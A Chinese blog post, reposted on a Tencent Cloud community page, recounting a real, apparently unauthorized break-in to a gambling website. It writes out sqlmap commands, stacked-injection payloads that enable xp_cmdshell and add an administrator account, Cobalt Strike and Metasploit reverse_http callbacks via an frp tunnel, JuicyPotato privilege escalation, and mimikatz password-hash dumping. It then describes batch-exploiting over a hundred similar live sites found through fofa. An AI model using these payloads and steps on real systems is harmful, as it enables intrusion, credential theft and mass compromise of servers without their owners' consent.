专栏首页乌鸦安全实战博彩站点-从弱口令到提权(文字版)

实战博彩站点-从弱口令到提权(文字版)

前言

我们的小团队对偶然发现的bc站点进行的渗透,从一开始只有sqlmap反弹的无回显os-shell到CS上线,到配合MSF上传脏土豆提权,到拿下SYSTEM权限的过程,分享记录一下渗透过程

0x01:登录框sql注入

看到登录框没什么好说的,先试试sqlmap一把梭

burp抓包登录请求,保存到文件直接跑一下试试

python3 sqlmap.py -r "2.txt"

有盲注和堆叠注入

看看能不能直接用sqlmap拿shell

python3 sqlmap.py -r "2.txt" --os-shell

目测不行

提示的是xp_cmdshell未开启,由于之前扫出来有堆叠注入,尝试运用存储过程打开xp_cmdshell

Payload:

userName=admin';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;WAITFOR DELAY '0:0:15' --&password=123

延时15秒,执行成功(如果没有堆叠注入就把每个语句拆开一句一句执行,效果理论上应该是一样的)

顺便试试看直接用xp_cmdshell来加用户提权,构造payload(注意密码别设太简单,windows系统貌似对密码强度有要求,设太简单可能会失败)

userName=admin';exec xp_cmdshell 'net user cmdshell Test ZjZ0ErUwPcxRsgG8E3hL /add';exec master..xp_cmdshell 'net localgroup administrators Test /add';WAITFOR DELAY '0:0:15' --&password=123

nmap扫了一下,目标的3389是开着的,mstsc.exe直接连

没连上

再跑一下os-shell,发现能跑绝对路径了,好兆头

成功弹出shell

因为是盲注,所以执行whoami之类的命令各种没回显,于是直接来个CS的shellcode

生成的shellcode直接粘贴进os-shell里回车

然后CS里啪的一下就上线了,很快啊.赶紧喊几个不讲武德的年轻人上线打牌

0x02:信息收集

tasklist看一下进程,有阿里云盾,有点难搞

systeminfo看看有什么

阿里云的服务器,版本windows server 2008 R2打了75个补丁

whoami一下,目测数据库被做过降权,nt service权限,非常低

尝试传个ms-16-032的exp上去,直接上传失败

到这里,CS的作用已经极其有限了.CS也就图一乐,真渗透还得靠MSF

0x03:利用frp到CS服务端联动MSF攻击

在CS上开一个监听器

修改一下frp的配置文件

保存配置文件后在frp文件夹下启动frp

./frpc -c frpc.ini

打开msf开启监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_httpset LHOST 127.0.0.1set LPORT 9996run

这里可以看到MSF已经开启监听了

回到CS,右键选一个主机增加一个会话

选择刚创建好的监听器,choose

回到msf,session啪的一下就弹回来了,很快啊

我们进shell看一下,实际上就是接管了CS的beacon,依然是低权限

0x04:上传烂土豆EXP提权

在本地准备好一个烂土豆的EXP(注意windows路径多加个斜杠,虽然也可以不加,但试了几台机子发现加了成功率高,不知道什么原理)

upload /root/EXP/JuicyPotato/potato.exe C:\\Users\\Public

CS翻一下目标机器的文件,发现成功上传

然后进目标机器的这个文件夹下开始准备提权

cd C:\\Users\\Publicuse incognitoexecute -cH -f ./potato.exelist_tokens -u复制administrator的令牌impersonate_token "administrator的令牌"

最后检查一下是否提权成功

0x05:mimikatz抓取密码hash

先提个权

getsystem

试试能不能直接dump出来

不行,只好用mimikatz了

load mimikatz

然后抓取密码哈希

mimikatz_command -f samdump::hashes

也可以用MSF自带的模块(这个比mimikatz慢一点)

run post/windows/gather/smart_hashdump

然后丢到CMD5解密,如果是弱口令可以解出账户密码,这次运气比较好,是个弱口令,直接解出了密码,然后mstsc.exe直接连,成功上桌面

0x06:信息收集扩大攻击范围

成功获取到目标最高权限之后,尝试通过信息收集获取其他相类似的站点进行批量化攻击.

@crow师傅提取了该网站的CMS特征写了一个fofa脚本批量扫描,最终得到了1900+个站点

但由于bc站往往打一枪换一个地方,这些域名往往大部分是不可用的,因此需要再确认域名的存活状态,使用脚本最终得到了一百多个存活域名

在使用脚本批量访问带漏洞的URL,把生成的request利用多线程脚本批量发起请求去跑这个请求

python3 sqlmap.py -r "{0}" --dbms="Microsoft SQL Server" --batch --os-shell

最终得到可以弹出os-shell的主机,再通过手工注入shellcode,最终得到大量的上线主机

0x07:进后台逛逛

用数据库里查出来的管理员账号密码登录网站后台看一看

20个人充值了80多万

还有人的游戏账号叫"锦绣前程",殊不知网赌就是在葬送自己的前程!

本文分享自微信公众号 - 乌鸦安全(crowsec),作者:ours学习小组

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-01-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

推荐阅读

  • 如何在GPU云服务器上编译FFMPEG

    FFMPEG是目前流行且开源跨平台音视频流处理的框架级解决方案。其功能强大,从音视频记录、编解码、转码、复用、过滤到流化输出,FFMPEG的命令行工具都能高效处理。

    溪歪歪
    云服务器GPU 云服务器视频处理
  • Flink 实践教程:进阶2-复杂格式数据抽取

    流计算 Oceanus 是大数据产品生态体系的实时化分析利器,是基于 Apache Flink 构建的具备一站开发、无缝连接、亚秒延时、低廉成本、安全稳定等特点的企业级实时大数据分析平台。流计算 Oceanus 以实现企业数据价值最大化为目标,加速企业实时化数字化的建设进程。

    吴云涛
    流计算 OceanusFlink
  • 腾讯云Elasticsearch集群运维常用命令详解一(集群篇)

    腾讯云Elasticsearch Service产品提供了一种全托管的云端服务,客户可以在腾讯云控制台一键创建集群、轻松管理集群,以及高度灵活的弹性变配模式。因此,使用腾讯云ES,您可以快速部署、按需扩展您的集群,简化复杂运维工作,快速构建日志分析、异常监控、网站搜索、企业搜索、BI分析等各类业务。同时腾讯云ES团队也提供了高度专业的平台管控、内核开发及集群运维能力。本文将从集群运维角度出发,分享我们日常工作中帮客户运维集群时常用到的一些命令,以及各命令适用的场景。

    吴容
    ElasticsearchService
  • 系统设计:Twitter搜索服务

    Twitter是最大的社交网络服务之一,用户可以在其中共享照片、新闻和基于文本的消息。在本章中,我们将设计一个可以存储和搜索用户推文的服务。类似的问题:推特搜索。

    小诚信驿站
    微服务架构系统架构架构设计微服务
  • 系统设计:实时建议服务

    让我们设计一个实时建议服务,当用户输入文本进行搜索时,它会向用户推荐术语。类似服务:自动建议,提前键入搜索

    小诚信驿站
    系统架构微服务架构微服务架构设计分布式
  • Flink 实践教程:进阶1-维表关联

    流计算 Oceanus 是大数据产品生态体系的实时化分析利器,是基于 Apache Flink 构建的具备一站开发、无缝连接、亚秒延时、低廉成本、安全稳定等特点的企业级实时大数据分析平台。流计算 Oceanus 以实现企业数据价值最大化为目标,加速企业实时化数字化的建设进程。

    吴云涛
    流计算 OceanusFlink
  • 腾讯云API网关的OAuth 2.0集成

    API网关是腾讯云上流量治理的产品,一般起到承载流量入口的能力。它提供 API 托管服务,能提供 API 的完整生命周期管理,包括创建、维护、发布、运行、下线等。

    Yagr Xu
    API 网关
  • 腾讯云Elasticsearch索引生命周期管理原理及实践

    本文将从三个方面介绍Elasticsearch索引生命周期管理的特性,首先会介绍ES索引生命周期管理的基本原理,其次会通过一个常见的日志场景来一步步配置索引生命周期管理,最后向大家介绍在日常的ES运维工作中遇到的关于索引生命周期管理常见的问题及解决方法。

    吴容
    ElasticsearchService
  • 聊一聊Vue的单向数据流

    Vue官方对单向数据流的描述是这样的(去掉了几句):父子 prop 之间形成了一个单向下行绑定,父级 prop 的更新会向下流动到子组件中,额外的,每次父级组件发生变更时,子组件中所有的 prop 都将会刷新为最新的值。

    青年码农
  • 音视频开发之旅(59)- 捕获收集、定位分析 Native崩溃

    我们知道Java崩溃是在Java代码中出现了未捕获异常,导致程序异常退出,常见的异常有:NPE、OOM、ArrayIndexOutOfBoundsException、IllegalStateException、ConcurrentModificationException等等。 还有一类崩溃,也是我们不得不关注,那就是Native层崩溃,这类崩溃不像Java层崩溃那样比较清晰的看出堆栈信息以及具体的崩溃。每当遇到是都要查找分析,写这篇的目的是帮助自己做下记录,也希望能帮到有类似困扰的你,下面我们开始一起学习实践吧。 本文学习实践的demo以张绍文《Android开发高手课》中的例子进行。

    音视频开发之旅
    短视频

扫码关注云+社区

领取腾讯云代金券